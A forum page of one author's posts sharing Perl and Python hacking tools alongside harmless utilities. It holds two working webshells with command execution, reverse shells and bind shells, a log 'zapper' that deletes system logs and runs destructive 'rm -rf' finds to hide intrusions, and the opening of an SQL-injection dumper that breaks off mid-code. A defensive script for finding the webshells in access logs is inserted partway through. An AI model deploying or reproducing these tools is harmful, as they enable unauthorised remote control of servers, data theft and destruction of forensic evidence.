
Topics - BigBear

#361
Perl / [Perl] crazymouse() function
July 03, 2011, 09:40:43 PM
Hello everyone

Yes, it's me again, with this new function crazymouse();
with this function you can drive the mouse crazy so it can't be controlled
at all for a time of your choosing, very useful if you are about to
make a virus

Code: perl

#By Doddy H
use Win32::GuiTest qw(MouseMoveAbsPix SendMessage);

sub crazymouse {
for my $number(1..$_[0]) {
MouseMoveAbsPix($number,$number);
}
}


Usage example

Code: perl

crazymouse("666");

#362
Perl / [Perl] conectar() function
July 03, 2011, 09:40:26 PM
Hello everyone.

Here is a function to connect via sockets to whatever server you want

Code: perl

use IO::Socket;

sub conectar {

my $re;
# open a TCP connection to host $_[0] on port $_[1]; give up after 5 seconds
# and return undef if the connection cannot be made
my $sockex = IO::Socket::INET->new(PeerAddr => $_[0],PeerPort => $_[1],
Proto => "tcp",Timeout  => 5) or return;

# send $_[2] followed by CRLF and read up to 5000 bytes of the reply
print $sockex $_[2]."\r\n";
$sockex->read($re,5000);
$sockex->close;
return $re."\r\n";
}


Syntax

Code: text

conectar(host,port,parameter to send)


Usage example

Code: perl

$re = conectar("127.0.0.1","80","GET /sql.php HTTP/1.0\r\n");
print $re;



#363
Perl / [Perl] cmd() function
July 03, 2011, 09:40:16 PM
Hello everyone

I just made this cmd() function to be able to run commands
conveniently

Code: perl

#By Doddy H

use Win32::Job;

sub cmd {

my $job = Win32::Job->new;
# run the command through "cmd /C" without a console window, sending both
# stdout and stderr to a temporary log file
$job->spawn("cmd",qq{cmd /C $_[0]},{
no_window => "true",
stdout => "logx.txt",
stderr => "logx.txt"
}
);
# wait up to 30 seconds for the command to finish
my $ok = $job->run(30);

# read the captured output back and remove the temporary file
open (my $fh,"<","logx.txt") or return;
my @words = <$fh>;
close $fh;

unlink("logx.txt");

return @words;

}


Usage example

Code: perl

@re = cmd("ver");
print @re;

#364
Perl / [Perl] cambiar_fondo() function
July 03, 2011, 09:40:04 PM
Hello everyone

I just made a function using the Windows API to
change the desktop wallpaper just by giving the path of the
image

Code: perl


#By Doddy H

use Win32::API;

sub cambiar_fondo {

# SystemParametersInfo(uiAction, uiParam, pvParam, fWinIni) from user32.dll
my $spi = Win32::API->new("user32","SystemParametersInfo", ["L","L","P","L"],"L");
# uiAction 20 = SPI_SETDESKWALLPAPER; pvParam is the path of the image
$spi->Call(20,0,$_[0],0);

}


Usage example

Code: perl

cambiar_fondo("c:/Perl/img.bmp");
#365
Perl / [Perl] FTP Manager
July 03, 2011, 09:39:45 PM
Today I finished this simple FTP client; the code is as follows

Code: perl

#!/usr/bin/perl
#FTP Manager
#(C) Doddy Hackman 2010

use strict;
use warnings;
use Net::FTP;

head();

print "\n\n[FTP Server] : ";
chomp (my $ftp = <STDIN>);
print "[User] : ";
chomp (my $user = <STDIN>);
print "[Pass] : ";
chomp (my $pass = <STDIN>);


if (my $socket = Net::FTP->new($ftp)) {
if ($socket->login($user,$pass)) {

print "\n[+] Logged in to the FTP server\n\n";

# command loop; every command is matched anchored to the whole line, so that
# for example "mkdir" and "rmdir" are no longer also handled as "dir"
while (1) {

print "\n\n>>";
chomp (my $cmd = <STDIN>);
print "\n\n";

if ($cmd=~/^help$/i) {
print q(

help : show information
cd : change directory <dir>
dir : list a directory
mkdir : create a directory <dir>
rmdir : delete a directory <dir>
pwd : print the current directory
del : delete a file <file>
rename : change the name of a file <file1> <file2>
size : size of a file <file>
put : upload a file <local> <remote>
get : download a file <remote> <local>
cdup : go up one directory
exit : close the session


);
}

if ($cmd=~/^dir$/i) {
if (my @files = $socket->dir()) {
for(@files) {
print "[+] ".$_."\n";
}
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/^pwd$/i) {
print "[+] Path : ".$socket->pwd()."\n";
}

if ($cmd=~/^cd (.+)$/i) {
if ($socket->cwd($1)) {
print "[+] Directory changed\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/^cdup$/i) {
if ($socket->cdup()) {
print "\n\n[+] Directory changed\n\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/^del (.+)$/i) {
if ($socket->delete($1)) {
print "[+] File deleted\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/^rename (\S+) (\S+)$/i) {
if ($socket->rename($1,$2)) {
print "[+] File renamed\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/^mkdir (.+)$/i) {
if ($socket->mkdir($1)) {
print "\n\n[+] Directory created\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/^rmdir (.+)$/i) {
if ($socket->rmdir($1)) {
print "\n\n[+] Directory deleted\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/^exit$/i) {
$socket->quit;
copyright();
exit(0);
}

if ($cmd=~/^get (\S+) (\S+)$/i) {
print "\n\n[+] Downloading file\n\n";
if ($socket->get($1,$2)) {
print "[+] Download completed";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/^put (\S+) (\S+)$/i) {
print "\n\n[+] Uploading file\n\n";
if ($socket->put($1,$2)) {
print "[+] Upload completed";
} else {
print "\n\n[-] Error\n\n";
}
}

}

} else {
print "\n\n[-] Login failed\n\n";
}

} else {
print "\n\n[-] Error\n\n";
}

sub head {
print "\n\n -- == FTP Manager == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2010\n\n";
}


# ¿ The End ?


If you want to download it from sourceforge

Code: text

https://sourceforge.net/projects/ftpmanager/

#366
Perl / [Perl] Find paths
July 03, 2011, 09:38:44 PM
A simple scanner to look for directories without an index on
whatever page you want

Code: perl

#!usr/bin/perl
#Find Paths
#(C) Doddy Hackman 2011

use LWP::UserAgent;
use HTML::LinkExtor;
use URI::Split qw(uri_split);

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();
unless($ARGV[0]) {
print "\n\n[+] Sintax : $0 <web>\n\n";
} else {
scan($ARGV[0]);
}
copyright();

sub scan {

print "\n[+] Find paths in $_[0]\n\n\n";
my @urls = repes(get_links(toma($_[0])));
for $url(@urls) {
my $web = $url;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($url);
if ($_[0] =~/$auth/ or $auth eq "") {
if ($path=~/(.*)\/(.*)\.(.*)$/) {
my $borrar = $2.".".$3;
if ($web=~/(.*)$borrar/) {
my $co = $1;
unless ($co=~/$auth/) {
$co = $_[0].$co;
}
$code = toma($co);
if ($code=~/Index Of/ig) {
print "[Link] : ".$co."\n";
}}}}}}

sub get_links {

$test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
return @links;

sub agarrar {
my ($a,%b) = @_;
push(@links,values %b);
}
}

sub repes {
foreach $test(@_) {
push @limpio,$test unless $repe{$test}++;
}
return @limpio;
}

sub head {
print "\n\n-- == Find Paths == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}

sub toma {
return $nave->get($_[0])->content;
}

sub tomar {
my ($web,$var) = @_;
return $nave->post($web,[%{$var}])->content;
}

#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?
#367
Perl / [Perl] DH Player
July 03, 2011, 09:38:25 PM
Well, this is a simple music player I made in Perl.
In this version you can search for music and play it, all in one cool window

Code: perl

#!/usr/bin/perl
#DH Player 0.1
#(C) Doddy Hackman 2011

use Tk;
use Win32::MediaPlayer;

if ($^O eq 'MSWin32') {
use Win32::Console;
Win32::Console::Free();
}


$test = new Win32::MediaPlayer;

$new = MainWindow->new(-background=>"black");
$new->geometry("350x420+20+20");
$new->resizable(0,0);
$new->title("DH Player 0.1 (C) Doddy Hackman 2011");
$new->Label(-background=>"black",-foreground=>"green",-font=>"Impact",-text=>"Directory : ")->place(-x=>"20",-y=>"20");
my $dir = $new->Entry(-background=>"black",-foreground=>"green",-text=>"C:\\Users\\Daniel\\Desktop\\WarFactory\\Perl\\musica")->place(-x=>"100",-y=>"25");
$new->Button(-background=>"black",-foreground=>"green",-activebackground=>"green",-text=>"Search",-width=>"10",-command=>\&buscar)->place(-x=>"240",-y=>"25");
$new->Label(-background=>"black",-foreground=>"green",-text=>"Files Found",-font=>"Impact")->place(-y=>"95",-x=>"120");
my $lists = $new->Listbox(-background=>"black",-foreground=>"green")->place(-y=>"130",-x=>"100");
$new->Button(-background=>"black",-foreground=>"green",-text=>"Play",-width=>"55",-activebackground=>"green",-command=>\&play)->place(-y=>"310");
$new->Button(-background=>"black",-foreground=>"green",-text=>"Pause",-width=>"55",-activebackground=>"green",-command=>\&pause)->place(-y=>"333");
$new->Button(-background=>"black",-foreground=>"green",-text=>"Resume",-width=>"55",-activebackground=>"green",-command=>\&resume)->place(-y=>"356");
$new->Button(-background=>"black",-foreground=>"green",-text=>"Stop",-width=>"55",-activebackground=>"green",-command=>\&stop)->place(-y=>"379");


MainLoop;


sub play {

my $dir = $dir->get;

$d = $lists->curselection();

for my $id (@$d) {
my $cancion = $lists->get($id);
$test->load($dir."\\".$cancion);
$test->play;
}

}

sub stop {
$test->close;
}

sub pause {

my $dir = $dir->get;

$d = $lists->curselection();

for my $id (@$d) {
my $cancion = $lists->get($id);
$test->pause;
}

}

sub resume {

my $dir = $dir->get;

$d = $lists->curselection();

for my $id (@$d) {
my $cancion = $lists->get($id);
$test->resume;
}

}

sub buscar {

$lists->delete(0.0,"end");

#$dir = "C:\\Users\\Daniel\\Desktop\\WarFactory\\Perl\\musica";

my $dir = $dir->get;

# read the directory given in the entry box; do nothing if it cannot be opened
opendir DIR,$dir or return;

my @archivos = readdir DIR;

closedir DIR;

chomp @archivos;

foreach my $file(@archivos) {
if (-f $dir."\\".$file) {
$lists->insert("end",$file);
}
}

}


# ¿ The End ?



If you want to download it from sourceforge

Code: text

https://sourceforge.net/projects/dhplayer/


#368
Perl / [Perl] Commander
July 03, 2011, 09:38:14 PM
Well, this program is a web server in Perl with the following options

* List directories
* View files
* Delete directories and files
* ReverseShell
* BindPort

Code: perl

#!usr/bin/perl
#
#C0mmand3r (C) Doddy HAckman 2011
#Version 0.1
#
#A simple WebShell in Perl
#
#

use IO::Socket;
use CGI;
use Cwd;
use HTML::Entities;
use URI::Escape;
use Win32;
use Net::hostent;

my $port = rep();

sub rep {
unless($ARGV[0]) {
return int("666"); #Your Can Edit 666
} else {
return int($ARGV[0]);
}
}

print "\n\n#########################################\n\n";
print "C0mmand3r (C) Doddy HAckman 2011\n\n\n";
print "[+] Starting the webshell on port $port\n\n";
print "#########################################\n\n";


my $sock = new IO::Socket::INET(
LocalHost => 'localhost',
LocalPort => $port,
Proto     => 'tcp',
Listen    => SOMAXCONN,
Reuse     => 1);


while ($jebus = $sock->accept()) {


print $jebus "HTTP/1.1 200/OK\r\nContent-type:text/html\r\n\r\n";
#print $jebus "HTTP/1.1 200/OK\r\nContent-type:application/w-www-form-urlencoded\r\n\r\n";
next if $slave=fork;

close $sock;

while ($response = <$jebus>) {

chomp($response);

my %rta;


if ($response=~/GET/ig) {
capturar($response);
}


sub capturar {
my $aa = shift;
chomp $aa;
if ($aa=~/GET \/(.*) HTTP\/1.1/ig) {
my $todo = $1;
if ($todo=~/\?(.*)=(.*)&(.*)=(.*)/ig) {
$rta{$1} = $2;
$rta{$3} = $4;
}
if ($todo=~/\?(.*)=(.*)/ig) {
$rta{$1} = $2;
}
}


}

print $jebus "

<html><body><title>Commander (C) Doddy Hackman 2011</title>

<style type=text/css>

.main {
margin : -287px 0px 0px -490px;
border : White solid 1px;
BORDER-COLOR: cyan;
}


#pie {
position: absolute;
bottom: 0;
}

body,a:link {
background-color: #000000;
color:cyan;
Courier New;
cursor:crosshair;
font-size: small;
}

input,table.outset,table.bord,table,textarea,select {
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
background-color:black;color:cyan;
border: solid 1px cyan;
border-color:cyan
}

a:link,a:visited,a:active {
color: cyan;
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
text-decoration: none;
}

</style>


<h2><center>Commander WebShell</center></h2>

";


if ($rta{'loadfile'}) {

my $file = uri_unescape($rta{'loadfile'});


print $jebus "<br><h2><center>File ".$file."</h2></center><br><br>";

if (-f $file) {

print $jebus "<center><textarea name=codefile cols=70 rows=70>";

open (FILE,$file);
@words = <FILE>;
close FILE;

for (@words) {
print $jebus HTML::Entities::encode($_);
}
print $jebus "
</textarea></center>
</center><br><br>
</form>
";

exit(1);
}
}

print $jebus "
<br><br>
<b>Console</b>
<br><br>
<fieldset>";


if ($rta{'cmd'}) {
print $jebus qx($rta{'cmd'});
}


elsif ($rta{'loadir'}) {
my $dir = uri_unescape($rta{'loadir'});
print "recibi $dir\n\n";
if (-d $dir) {
opendir DIR,$dir;
my @archivos = readdir DIR;
close DIR;

for(@archivos) {

if (-d $_) {
print $jebus "<b>".$_."</b><br>";
} else {
print $jebus $_."<br>";
}}}}

elsif ($rta{'delfile'}) {

my $file = uri_unescape($rta{'delfile'});


if (-f $file) {

if (unlink($file)) {
print $jebus "<script>alert('File Deleted');</script>";
} else {
print $jebus "<script>alert('Error');</script>";
}
}
}

elsif ($rta{'deldir'}) {

my $dir = uri_unescape($rta{'deldir'});

if (-d $dir) {
if (rmdir($dir)) {
print $jebus "<script>alert('Directory Deleted');</script>";
} else {
print $jebus "<script>alert('Error');</script>";
}
}
}

elsif ($rta{'ipconnect'}) {
print $rta{'ipconnect'}."\n";
print $rta{'port'}."\n";
conectar($rta{'ipconnect'},$rta{'port'});
tipo();

sub conectar {
socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
}

sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
#root(); 
system("export TERM=xterm;exec sh -i");
}
}

sub infowin {
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}

sub infolinux {
print "[+] System information\n\n";
system("uname -a");
print "\n\n";
}
}

elsif($rta{'portbind'}) {

$backdoor = IO::Socket::INET->new(
Proto     => 'tcp',
LocalPort => $rta{'portbind'},
Listen    => SOMAXC,
Reuse     => 1);


while ($jesus = $backdoor->accept()) {
$jesus->autoflush(1);
print $jesus "[*] Heaven_Door Online\n[*] Port : 25256\n[*] PID : ".$$."\n\n";
print $jesus "Welcome  ".$jesus->peerhost."\n\n";
&extras;
$dir = getcwd();
print $jesus $dir.">>";
while (<$jesus>) {
my $yeah = qx($_);
print $jesus "\n\n".$yeah."\n\n";
print $jesus $dir.">>";
}
}

sub extras {

if ($^O =~//ig) {
print $jesus "[+] Domain Name : ".Win32::DomainName()."\n";
print $jesus "[+] OS Version : ".Win32::GetOSName()."\n";
print $jesus "[+] Username : ".Win32::LoginName()."\n\n\n";
} else {
$s =  qx("uname -a");
print $jesus "--==System Info==--\n\n".$s;
}
}
} else {

opendir DIR,getcwd();
my @archivos = readdir DIR;
close DIR;

for(@archivos) {
if (-d $_) {
print $jebus "<b>".$_."</b><br>";
} else {
print $jebus $_."<br>";
}}

}

print $jebus "</fieldset>
<br><br>
<form action='' method=GET>
<b>Command</b> : <input type=text name=cmd size=100 value=ver><input type=submit value=Send><br>
</form>
<form action='' method=GET>
<B>Load directory</B> : <input type=text size=100 name=loadir value=".getcwd()."><input type=submit value=Load>
</form>
<form action='' method=GET>
<b>Load File</b> : <input type=text size=100 name=loadfile value=".getcwd()."><input type=submit value=Load>
</form>
<form action='' method=GET>
<b>Delete File</b> : <input type=text size=100 name=delfile value=".getcwd()."><input type=submit value=Del>
</form>
<form action='' method=GET>
<b>Delete Directory</b> : <input type=text size=100 name=deldir><input type=submit value=Del>
</form>
<br><br><b>ReverseShell</b><br><br>
<form action='' method=GET>
<b>Your IP</B> : <input type=text name=ipconnect value=localhost><br>
<b>Port</b> : <input type=text name=port value=666><br>
<br><input type=submit value=Connect></form><br><br>

<b>BindPort</b><br><br>
<form action='' method=GET>
<b>Port</b> : <input type=text name=portbind value=666><br>
<br><input type=submit value=Bind></form><br><br>


</body></html>
";

$jebus->close;

}

} continue {
$jebus->close;
}

# ¿ The End ? 


If you want to download it from sourceforge

Code: text

https://sourceforge.net/projects/commanderx/
#369
Perl / [Perl] CGI Shell
July 03, 2011, 09:38:00 PM
Hello everyone

Today I finished making a shell in CGI; these shells are used on sites that allow running CGI files and have the cgi-bin directory

This shell has the following options

* List directories
* View and edit files
* Delete files and directories
* ReverseShell
* Upload files to a specified directory
* Run commands
* Send mail

Code: perl

#!"\xampp\perl\bin\perl.exe"
#
#CGI Shell 0.1
#
#(C) Doddy Hackman 2011
#
#

use CGI;
use Cwd;
use HTML::Entities;
use Net::SMTP;

my %rta;

my $que = new CGI;
my @ques = $que->param;

for(@ques) {
$rta{$_} = $que->param($_);
}


print "Content-type:text/html\n\n";
print "

<style type=text/css>


.main {
margin : -287px 0px 0px -490px;
border : White solid 1px;
BORDER-COLOR: #00FF00;
}


#pie {
position: absolute;
bottom: 0;
}

body,a:link {
background-color: #000000;
color:#00FF00;
Courier New;
cursor:crosshair;
font-size: small;
}

input,table.outset,table.bord,table,textarea,select {
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
background-color:black;color:#00FF00;
border: solid 1px #00FF00;
border-color:#00FF00
}

a:link,a:visited,a:active {
color: #00FF00;
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
text-decoration: none;
}

</style>

<title>CGI Shell (C) Doddy Hackman 2011</title>
<h2><center>CGI Shell</center></h2>

";

if ($rta{'filex'}) {

open FILE ,">>".$rta{'todir'}."/".$rta{'filex'};
while($bytes = read($rta{'filex'},$todo, 1024)) {
print FILE $todo;
}
close FILE;

print "<script>alert('File Uploaded');</script>";

}

if ($rta{'codefile'}) {

unlink($rta{'filecode'});

open (FILE,">>".$rta{'filecode'});
print FILE $rta{'codefile'}."\n";
close FILE;

print "<script>alert('File Changed');</script>";

}

if ($rta{'loadfile'}) {
print "<form action='' method=POST>";
print "<br><h2><center>File ".$rta{'loadfile'}."</h2></center><br><br>";

if (-f $rta{'loadfile'}) {

print "<center><textarea name=codefile cols=70 rows=70>";

open (FILE,$rta{'loadfile'});
@words = <FILE>;
close FILE;

for (@words) {
print HTML::Entities::encode($_);
}
print "
</textarea></center>
<input type=hidden name=filecode value=".$rta{'loadfile'}.">
<br><br><center><input type=submit value=Save></center><br><br>
</form>
";

exit(1);
}
}

print "
<br><br>
<b>Console</b>
<br><br>
<fieldset>";


if ($rta{'cmd'}) {
print qx($rta{'cmd'});
}

elsif ($rta{'mail'}) {

my $send = Net::SMTP->new("localhost",Hello => "localhost",Timeout=>10) or die("[-] Error");
$send->mail($rta{'mail'});
$send->to($rta{'to'});   
$send->data();
$send->datasend("To:".$rta{'to'}."\n"."From:".$rta{'mail'}."\n"."Subject:".$rta{'subject'}."\n".$rta{'body'}."\n\n");
$send->dataend();
$send->quit();

}


elsif ($rta{'loadir'}) {

if (-d $rta{'loadir'}) {

opendir DIR,$rta{'loadir'};
my @archivos = readdir DIR;
close DIR;

for(@archivos) {
if (-d $_) {
print "<b>".$_."</b><br>";
} else {
print $_."<br>";
}}}}

elsif (-f $rta{'delfile'}) {
if (unlink($rta{'delfile'})) {
print "<script>alert('File Deleted');</script>";
} else {
print "<script>alert('Error');</script>";
}
}

elsif (-d $rta{'deldir'}) {
if (rmdir($rta{'deldir'})) {
print "<script>alert('Directory Deleted');</script>";
} else {
print "<script>alert('Error');</script>";
}
}

elsif ($rta{'ipconnect'}) {

$code = '
#!usr/bin/perl
#Reverse Shell 0.1
#By Doddy H

use IO::Socket;

print "\n== -- Reverse Shell 0.1 - Doddy H 2010 -- ==\n\n";

unless (@ARGV == 2) {
print "[Sintax] : $0 <host> <port>\n\n";
exit(1);
} else {
print "[+] Starting the connection\n";
print "[+] Enter in the system\n";
print "[+] Enjoy !!!\n\n";
conectar($ARGV[0],$ARGV[1]);
tipo();
}

sub conectar {
socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
}

sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
#root(); 
system("export TERM=xterm;exec sh -i");
}
}

sub infowin {
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}

sub infolinux {
print "[+] System information\n\n";
system("uname -a");
print "\n\n";
}

#The End
';

if ($^O =~/Win32/ig) {
open (FILE,">>"."back.pl");
chmod("back.pl","777");
} else {
open (FILE,">>"."/tmp/back.pl");
chmod("/tmp/back.pl","777");
}

print FILE $code;
close FILE;

if ($^O == "MSWin32") {
system("back.pl ".$rta{'ipconnect'}." ".$rta{'port'});
} else {
system("cd /tmp;back.pl ".$rta{'ipconnect'}." ".$rta{'port'});
}
} else {

opendir DIR,getcwd();
my @archivos = readdir DIR;
close DIR;

for(@archivos) {
if (-d $_) {
print "<b>".$_."</b><br>";
} else {
print $_."<br>";
}}

}

print "</fieldset>
<br><br>
<form action='' method=GET>
<b>Command</b> : <input type=text name=cmd size=100 value=ver><input type=submit value=Send><br>
</form>
<form action='' method=GET>
<B>Load directory</B> : <input type=text size=100 name=loadir value=".getcwd()."><input type=submit value=Load>
</form>
<form action='' method=GET>
<b>Load File</b> : <input type=text size=100 name=loadfile value=".getcwd()."><input type=submit value=Load>
</form>
<form action='' method=GET>
<b>Delete File</b> : <input type=text size=100 name=delfile value=".getcwd()."><input type=submit value=Del>
</form>
<form action='' method=GET>
<b>Delete Directory</b> : <input type=text size=100 name=deldir><input type=submit value=Del>
</form>
<form enctype='multipart/form-data' method=POST>
<br><b>Upload File</b> : <input type=file name=filex><br><br>
<b>To dir</b> : <input type=text name=todir value=".getcwd()."><br><br>
<input type=submit value=Upload>
</form>
<br><B>Mailer</b><br><br>
<form action='' method=GET>
<b>Mail</b> : <input type=text name=mail><br>
<b>To</b> : <input type=text name=to><br>
<b>Subject</B> : <input type=text name=subject><br>
<B>Body</B> : <input type=text name=body><br><br>
<input type=submit value=Send>
</form>
<br><br><b>ReverseShell</b><br><br>
<form action='' method=GET>
<b>IP</B> : <input type=text name=ipconnect><br>
<b>Port</B> : <input type=text name=port><br>
<br><input type=submit value=Connect></form><br><br>

";


# ¿ The End ?


If you want to download it from sourceforge

Code: text

https://sourceforge.net/projects/cgishellx/
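One way a defender can hunt for the two webshells above (Commander in #368 and CGI Shell in #369) in a web server access log, as an added example that is not part of the original posts. The parameter names are taken from the HTML forms in both shells; the log lines, hosts and IP addresses are constructed, and the log is assumed to be in common/combined format.

```python
#!/usr/bin/env python3
"""Flag access-log requests that carry the query parameters used by the
Commander and CGI Shell forms (added defender-side example, not code from
the posts; sample log lines below are constructed)."""
import re
from urllib.parse import parse_qs, urlsplit

# Parameter names from the forms in both posts. "port", "to", "subject" and
# "body" are too generic alone and are only counted beside a stronger name.
# Note: "filex" (upload) travels in a POST body and is only visible where
# request bodies are logged.
SHELL_PARAMS = {"cmd", "loadfile", "loadir", "delfile", "deldir",
                "ipconnect", "portbind", "filex", "todir", "filecode"}

# Common log format: client ident user [timestamp] "METHOD target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log (192.0.2.0/24 and 198.51.100.0/24 are documentation ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Jul/2011:21:38:00 -0300] "GET /index.html HTTP/1.1" 200 512',
    '192.0.2.10 - - [03/Jul/2011:21:38:05 -0300] "GET /cgi-bin/shell.cgi?cmd=ver HTTP/1.1" 200 2048',
    '192.0.2.10 - - [03/Jul/2011:21:38:09 -0300] "GET /cgi-bin/shell.cgi?ipconnect=198.51.100.7&port=666 HTTP/1.1" 200 1024',
    '198.51.100.20 - - [03/Jul/2011:21:40:00 -0300] "GET /search?q=cmd+prompt HTTP/1.1" 200 4096',
    '192.0.2.10 - - [03/Jul/2011:21:41:00 -0300] "GET /?loadfile=/var/www/index.html HTTP/1.1" 200 700',
    'garbage line that does not parse',
]


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it is malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    query = urlsplit(rec["target"]).query
    rec["params"] = {k.lower(): v
                     for k, v in parse_qs(query, keep_blank_values=True).items()}
    return rec


def classify(rec):
    """Return the reasons a parsed request looks like one of the two shells (empty if clean)."""
    names = set(rec["params"])
    hits = sorted(SHELL_PARAMS & names)
    reasons = []
    if hits:
        reasons.append("webshell parameter(s): " + ",".join(hits))
    if "ipconnect" in names and "port" in names:
        reasons.append("reverse-shell form submitted (ipconnect+port)")
    if "portbind" in names:
        reasons.append("bind-shell form submitted (portbind)")
    if hits and rec["target"].lower().startswith("/cgi-bin/"):
        reasons.append("request under /cgi-bin/")
    return reasons


def find_suspicious(lines):
    """Scan log lines and return one record per request that matched at least one reason."""
    flagged = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue          # unparseable lines are skipped, not silently scored
        reasons = classify(rec)
        if reasons:
            flagged.append({"ip": rec["ip"], "ts": rec["ts"], "target": rec["target"],
                            "params": sorted(SHELL_PARAMS & set(rec["params"])),
                            "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["target"])
        for reason in hit["reasons"]:
            print("    -", reason)
```

A bare `cmd=` parameter is a weak signal on its own; in production, weight it by path and by the client's other requests before alerting.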
#370
Python / [Python] Zapper By Doddy H
July 03, 2011, 09:37:08 PM
Hello everyone.

I just made a simple zapper in Python; you just load it onto the attacked web system and it starts
erasing traces.
Mind you, I hadn't realised how easy Python is to use xDD

Code: python

#!usr/bin/python
#Zapper (C) Doddy Hackman

import os

paths = ["/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp","/var/log/secure","/root/.ksh_history", "/root/.bash_history","/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp","/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm",
"/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs","/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog",
"/var/log/messages/", "/var/log/proftpd/xferlog.legacy","/var/log/proftpd.xferlog", "/var/log/proftpd.access_log","/var/log/httpd/error_log", "/var/log/httpsd/ssl_log","/var/log/httpsd/ssl.access_log", "/etc/mail/access","/var/log/qmail", "/var/log/smtpd", "/var/log/samba",
"/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority","/var/log/poplog", "/var/log/news.all", "/var/log/spooler","/var/log/news", "/var/log/news/news", "/var/log/news/news.all",
"/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice","/var/log/news/suck.err", "/var/log/news/suck.notice","/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks","/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log","/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs","/var/log/auth"]

comandos  = ['find / -name *.bash_history -exec rm -rf {} \;' , 'find / -name *.bash_logout -exec rm -rf {} \;','find / -name log* -exec rm -rf {} \;','find / -name  *.log -exec rm -rf {} \;','unset HISTFILE','unset SAVEHIST']

print "\n[+] Starting the zapper"

for path in paths :
try :
  os.delete(path)
except :
  pass

for cmd in comandos :
try:
  os.system(cmd)
except:
  pass

print "[+] All logs are erased\n"

#The End ?



#371
Python / [Python] SQL Scanner 0.3
July 03, 2011, 09:36:57 PM
Well, this is a simple scanner in Python that I made for SQLi

With the following options:

  • Checks for the vulnerability
  • Finds columns
  • Finds the magic number and pulls info about the DB
  • Pulls tables and columns from the current DB or another, external one
  • Dumps users
  • Saves everything to a log named after the site in the /logs folder


    Code: python

    #!usr/bin/python
    #SQL Scanner 0.3 (C) Doddy Hackman 2010

    import os,sys,urllib2,re,binascii
    from urlparse import urlparse

    def clean():
    if sys.platform=="win32":
      os.system("cls")
    else:
      os.system("clear")

    def savefile(name,text):
    file = open(name,"a")
    file.write("\n"+text+"\n")
    file.close()

    def gethost(test):
    return urlparse(test).netloc

    def header() :
    print "\n--== SQL Scanner ==--\n"

    def copyright() :
    print "\n\n(C) Doddy Hackman 2010\n"
    sys.exit(1)

    def show() :
    print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

    def toma(web) :
    nave = urllib2.Request(web)
    nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
    op = urllib2.build_opener()
    return op.open(nave).read()

    def bypass(bypass):
    if bypass == "--":
      return("+","--")
    elif bypass == "/*":
      return("/**/","/*")
    else:
      return("+","--")


    def dumper(web,passx,table,col1,col2):

    pass1,pass2 = bypass(passx)
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web)
    code1 = toma(web1+pass1+"from"+pass1+table+pass2)
    print "\n\n[+] Searching values\n\n"
